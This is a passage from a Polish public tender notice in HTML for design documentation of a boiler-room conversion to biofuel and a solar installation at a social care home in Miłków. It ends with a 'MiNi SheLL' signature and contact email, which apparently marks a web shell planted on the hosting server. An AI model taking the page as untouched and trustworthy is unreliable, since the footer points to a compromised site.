g) Wykonawca sporządzi kartę informacyjną przedsięwzięcia, w celu przeprowadzenia procedury uzyskania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia.
h) Wykonawca zobowiązany jest dopełnić wszelkich formalności prawnych związanych 
z wykonaniem przedsięwzięcia budowlanego, w tym w szczególności do uzyskania wymaganych przepisami uzgodnień, decyzji (w tym również decyzji środowiskowej przedsięwzięcia - o ile będzie wymagana), pozwoleń i opinii koniecznych do zgłoszenia do właściwego organu administracyjnego zamierzenia budowlanego polegającego na wykonaniu termomodernizacji budynków Domu Pomocy Społecznej JUNIOR w Miłkowie w zakresie wymiany stolarki okiennej i drzwiowej oraz docieplenia ścian i stropodachów - zgodnie z obowiązującymi przepisami prawa w tym zakresie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.24.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. okres rękojmi - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej zadania polegającego na zmianie systemu ogrzewania, przebudowie istniejącej kotłowni oraz instalacji kolektorów słonecznych 
w celu poprawy efektywności energetycznej przy wykorzystaniu odnawialnych źródeł energii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
a) przebudowę istniejącej kotłowni, opalanej olejem opałowym, na opalaną biopaliwem stałym (zrębek i pellet),
b) budowę instalacji solarnej wspomagającej przygotowanie ciepłej wody,
c) przebudowę istniejącej instalacji rozdzielczej ciepła pomiędzy kotłownią a ogrzewanymi budynkami.
Istotne postanowienia dotyczące przedmiotu zamówienia dotyczące CZĘŚCI II:
a) Wymagania podstawowe:
- montaż kotłów, działających niezależnie od siebie lub wspomagających siebie nawzajem, służących do przygotowania ciepła na cele c.o. i c.w.u. dla sześciu budynków Domu Pomocy Społecznej JUNIOR w Miłkowie: 1, 2, 3, 6 i 7, 8 i 9 oraz 11 (zgodnie z bilansem cieplnym zapotrzebowanie obiektu wynosi 550 kW - przy założeniu, że zostanie wykonana termomodernizacja budynków - zgodnie z opisem dot. Części I zamówienia),
- podawanie i magazynowanie paliwa,
- bufory i wymienniki ciepła,
- odprowadzenia i odpopielania spalin,
- gospodarka odpadem popaleniskowym,
- automatyka kotłowni i obiegów grzewczych,
- elektronicznie sterowany proces spalania,
- wentylator wyciągowy z płynną regulacją obrotów,
- zastosowanie rozwiązań systemowych w celu spójności funkcjonowania urządzeń,
- pozostałe elementy zostaną ustalone na etapie realizacji przedmiotu zamówienia i wymagać będą akceptacji Zamawiającego.
b) Instalacja kolektorów słonecznych w celu wspomagania produkcji ciepłej wody użytkowej - na dachach (płaskim i skośnym) kotłowni (budynek nr 11). Zamawiający wymaga, aby zastosowane zostały kolektory płaskie - z uwagi na specyfikę prowadzonej jednostki i ryzyko uszkodzenia kolektorów przez pensjonariuszy - stąd koniecznym jest zastosowanie rozwiązania, które zapewni ewentualną wymianę pojedynczego uszkodzonego elementu, bez konieczności wymiany całej konstrukcji.
c) Zamawiający informuje, że projektowanie sieci cieplnej w zakresie przeprowadzenia i kładzenia rur w ziemi przy podłączaniu budynku nr 1 do systemu dystrybucyjnego może stanowić utrudnienie z uwagi na ukształtowanie terenu, na którym usytuowany jest Dom Pomocy Społecznej JUNIOR w Miłkowie (teren górzysty).  
d) Szczegółowy opis obiektu kotłowni, a także budynków zaopatrywanych w c.o. i c.w.u., których dotyczy przedmiot zamówienia został zawarty w Opisach techniczno-budowlanych budynków, załączonych do niniejszej SIWZ wraz ze zdjęciami oraz rzutami poszczególnych kondygnacji, 
a także planem sytuacyjnym obiektu oraz mapą zasadniczą obiektu.
e) Dokumentacja projektowo-kosztorysowa zadania zostanie opracowana zgodnie z obowiązującymi przepisami prawa i normami stosowanymi w budownictwie,  w tym w szczególności zgodnie z przepisami: 
- ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r., poz. 1409 
z późn. zm.) oraz przepisami wykonawczymi,
- rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.),
- rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).
f) Dokumentacja projektowa będzie służyć do opisu przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego na roboty budowlane, dlatego też dokumentacja musi być opracowana zgodnie z art. 29-31 ustawy Pzp. Wymagane jest, aby Wykonawca opisał przedmiot zamówienia na roboty budowlane bez wskazania znaków towarowych, patentów lub pochodzenia, chyba, że nie będzie możliwości opisania go za pomocą dostatecznie dokładnych określeń - wówczas Wykonawca poda co najmniej dwóch producentów materiałów lub urządzeń oraz użyje sformułowanie lub równoważny, a także poda parametry równoważności tych materiałów lub urządzeń i opisze, w jaki sposób równoważność ma zostać zweryfikowana przez Zamawiającego.
g) Kluczowe etapy prac projektowych, dotyczące przyjętej koncepcji (rozwiązania projektowego) i zastosowanych materiałów i urządzeń, wymagają akceptacji Zamawiającego.
h) Zakres rzeczowy dokumentacji obejmuje opracowanie:
- projektu budowlanego (w tym: informacja dotycząca bezpieczeństwa 
i ochrony zdrowia - BIOZ, charakterystyka energetyczna) - w ilości 5 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- projektu wykonawczego - w ilości 4 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- specyfikacji technicznej wykonania i odbioru robót - w ilości 3 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- przedmiaru robót - w ilości 3 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- kosztorysu inwestorskiego - w ilości 2 egz. + 1 egz. w wersji elektronicznej edytowalnej + format PDF.
i) W/w dokumenty Wykonawca przekaże Zamawiającemu w formie pisemnej oraz na płycie CD w wersji elektronicznej edytowalnej (.doc, .dgw, .xls) i w formacie .pdf. 
j) Wykonawca sporządzi kartę informacyjną przedsięwzięcia, w celu przeprowadzenia procedury uzyskania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia.
k) Wykonawca zobowiązany jest dopełnić wszelkich formalności prawnych związanych z wykonaniem przedsięwzięcia budowlanego, w tym w szczególności do uzyskania wymaganych przepisami uzgodnień, decyzji (w tym również decyzji środowiskowej przedsięwzięcia - o ile będzie wymagana), pozwoleń i opinii koniecznych do uzyskania prawomocnej decyzji pozwolenia na budowę inwestycji polegającej na przebudowie kotłowni Domu Pomocy Społecznej JUNIOR w Miłkowie, budowie nowych sieci i przyłączy cieplnych, a także instalacji kolektorów słonecznych - zgodnie z obowiązującymi przepisami prawa w tym zakresie. 
W sytuacji gdy inwestycja nie będzie wymagała uzyskania pozwolenia na budowę, Wykonawca w imieniu Inwestora dokona zgłoszenia robót niewymagających pozwolenia na budowę do właściwego organu administracyjnego oraz przedstawi Zamawiającemu kopię złożonego zgłoszenia, zawierającego datę i pieczęć organu przyjmującego zgłoszenie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.24.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. okres rękojmi - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com